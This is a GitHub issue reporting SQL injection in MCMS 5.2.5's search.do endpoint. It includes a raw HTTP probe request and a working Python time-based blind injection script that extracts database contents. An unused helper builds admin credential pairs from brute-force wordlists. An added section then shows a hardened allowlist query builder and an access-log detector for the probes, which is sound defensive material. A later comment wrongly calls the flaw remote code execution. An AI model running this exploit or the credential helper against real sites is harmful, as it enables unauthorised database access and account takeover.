MCMS5.2.5 net/mingsoft/cms/action/web/MCmsAction.java SQLI #63

Closed
aw220 opened this issue Jan 20, 2022 · 1 comment
aw220 commented Jan 20, 2022

As you can see, the injection was successful, and the next step is to save the POST package and put it into sqlmap to run.
[screenshot]

Look up the field and find the incoming parameter.
[screenshot]

Since the parameter names are directly spliced into strings without filtering, there may be a loophole, so let's move on to the next data chain.
[screenshot]
[screenshot]

This block was found to have database calls.
[screenshot]

Next we try to inject. Looking at the file net/mingsoft/cms/action/web/MCmsAction.java, at the top of the class definition you can see that the route is host:port/mcms; adding the method to be called gives the route host:port/mcms/search.do. Next, try to inject:

```http
GET /mcms/search.do?1'=0000 HTTP/1.1
User-Agent: PostmanRuntime/7.29.0
Accept: */*
Postman-Token: 315bc447-c977-4eb8-8b99-ae231e7a2b08
Host: localhost:8080
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=96B0978724C81C34A99F09541FA893D4
```

[screenshot]

Next I wrote a Python file for convenient validation, using time-delayed injection:

```python
import base64
import requests

"""
{0}: the thing to query
{1}: start position
{2}: length
{3}: guessed value
"""
host = "http://localhost:8080/mcms/search.do?'%2b(select+'123'+AND+if(ascii(substr({0},{1},{2}))%3d{3},sleep(2),2)),--+=000"

# Not called below; writes base64-encoded "admin:<pwd>" pairs from local wordlists.
def a():
    with open("/Users/helu/penetration/bruteDicts/account/top500_username.txt", "r") as usernames:
        with open("/Users/helu/penetration/bruteDicts/account/pwdFast.txt", "r") as pwds:
            with open("/Users/helu/penetration/bruteDicts/account/admin_pwd.txt", "a+") as file:
                data1 = usernames.read().splitlines()
                data2 = pwds.read().splitlines()
                for username in data1:
                    for pwd in data2:
                        str = base64.encodebytes(("admin" + ":" + pwd).encode("utf-8"))

                        # str += "\n"
                        file.write(str.decode("utf-8"))

# A request that takes longer than 3 s is treated as a hit for the time-based probe.
def timeout(url):
    try:
        rsp = requests.get(url, timeout=3)
        return rsp.text
    except Exception:
        return "timeout"


def guess_length(target):
    for i in range(1, 100):
        url = host.format(target,1,1,i)
        rsp = timeout(url)
        if "timeout" in rsp:
            print("库长:" + chr(i) )
            return int(chr(i))

def guess_char(tar,len):
    for i in range(0,len+1):
        for j in range(47, 123):
            url = host.format(tar,i,1,"'{0}'".format(j))
            rsp = timeout(url)
            if "timeout" in rsp:
                print(chr(j))

def b(tar):
    length = guess_length(tar)
    guess_char("database()",length)

b("length(database())")
```
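The root cause the report points at is that request parameter names (not just values) end up as SQL text. The following is an added example, not code from the issue or from the MCMS project: it models that pattern in Python against an in-memory SQLite table, puts a hardened builder beside it (field names checked against an allowlist, values always bound), and adds a small access-log check that flags search.do requests whose parameter names are not plain identifiers or whose response time is consistent with a time-delay probe. The table and column names, the allowlist, the log lines and the trailing response-time field in the log format are all constructed assumptions for the demo.

```python
import re
import sqlite3
from urllib.parse import parse_qsl, urlsplit

# Hypothetical allowlist of searchable columns (assumed for the demo; not MCMS's schema).
ALLOWED_FIELDS = {"title", "category", "author"}


def build_search_vulnerable(params):
    """Mirrors the pattern the issue describes: every request parameter NAME is
    concatenated straight into the WHERE clause, so the name becomes SQL text."""
    clauses, args = [], []
    for name, value in params.items():
        clauses.append(f"{name} = ?")  # name is attacker-controlled SQL text
        args.append(value)             # only the value is bound
    return "SELECT id FROM article WHERE " + " AND ".join(clauses), args


def build_search_hardened(params):
    """Parameter names are checked against a fixed allowlist before they can
    appear in SQL; values are always bound, never concatenated."""
    clauses, args = [], []
    for name, value in params.items():
        if name not in ALLOWED_FIELDS:
            raise ValueError(f"unknown search field: {name!r}")
        clauses.append(f"{name} = ?")
        args.append(value)
    if not clauses:
        return "SELECT id FROM article", []
    return "SELECT id FROM article WHERE " + " AND ".join(clauses), args


def setup_db():
    """In-memory SQLite table with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE article (id INTEGER, title TEXT, category TEXT, author TEXT)")
    conn.executemany("INSERT INTO article VALUES (?, ?, ?, ?)", [
        (1, "news", "public", "alice"),
        (2, "draft", "internal", "bob"),
        (3, "memo", "internal", "carol"),
    ])
    return conn


def run_search(conn, builder, params):
    """Returns ('rejected', msg) when the builder refuses the input,
    ('sql-error', msg) when the database chokes on the built SQL,
    or ('rows', [ids]) on success."""
    try:
        sql, args = builder(params)
    except ValueError as exc:
        return ("rejected", str(exc))
    try:
        return ("rows", [row[0] for row in conn.execute(sql, args).fetchall()])
    except sqlite3.Error as exc:
        return ("sql-error", str(exc))


# --- detection side: spotting the probes in an access log ---------------------
# Constructed log lines in a common-log-like layout; the last field is assumed
# to be the response time in seconds (not part of the default Nginx/Apache format).
LOG_LINES = [
    '10.0.0.5 - - [20/Jan/2022:10:00:01 +0800] "GET /mcms/search.do?title=news HTTP/1.1" 200 0.012',
    '10.0.0.5 - - [20/Jan/2022:10:00:02 +0800] "GET /mcms/search.do?1\'=0000 HTTP/1.1" 500 0.020',
    '10.0.0.5 - - [20/Jan/2022:10:00:05 +0800] "GET /mcms/search.do?\'%2b(select+sleep(2)),--+=000 HTTP/1.1" 200 2.031',
    '10.0.0.5 - - [20/Jan/2022:10:00:06 +0800] "GET /mcms/index.do HTTP/1.1" 200 0.005',
]
ACCESS_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3}) ([\d.]+)$')
IDENT_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_.]*$")   # what a legitimate field name looks like
SLOW_SECONDS = 1.5                                    # sleep(2) probes land well above this


def flag_search_request(line):
    """Returns None for a benign line, otherwise a dict describing why it was flagged:
    a parameter NAME that is not a plain identifier, and/or a slow search.do response."""
    match = ACCESS_RE.search(line)
    if not match:
        return None
    target, status, seconds = match.group(1), int(match.group(2)), float(match.group(3))
    parts = urlsplit(target)
    if not parts.path.endswith("/search.do"):
        return None
    names = [name for name, _ in parse_qsl(parts.query, keep_blank_values=True)]
    bad_names = [name for name in names if not IDENT_RE.match(name)]
    slow = seconds >= SLOW_SECONDS
    if not bad_names and not slow:
        return None
    return {"target": target, "status": status, "bad_names": bad_names, "slow": slow}


if __name__ == "__main__":
    db = setup_db()
    for params in ({"category": "public"}, {"1'": "0000"}, {"id > 0 OR category": "x"}):
        print("vulnerable:", run_search(db, build_search_vulnerable, params))
        print("hardened:  ", run_search(db, build_search_hardened, params))
    for line in LOG_LINES:
        print(flag_search_request(line))
```

Binding values with `?` is not enough on its own here: the key in the report's request (`1'`) never reaches a bind parameter, because it is a column name position, which no driver will parameterize. The allowlist is the fix for that position; the log check gives the operations side a way to see the probes, since a single quote in a parameter name and a search.do response that takes seconds are both things a legitimate client never produces.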

aboutZZ commented Mar 5, 2022

Wow, a remote code execution vulnerability. Almost two months have passed and not a single person has replied.

@killfen killfen closed this as completed Sep 9, 2022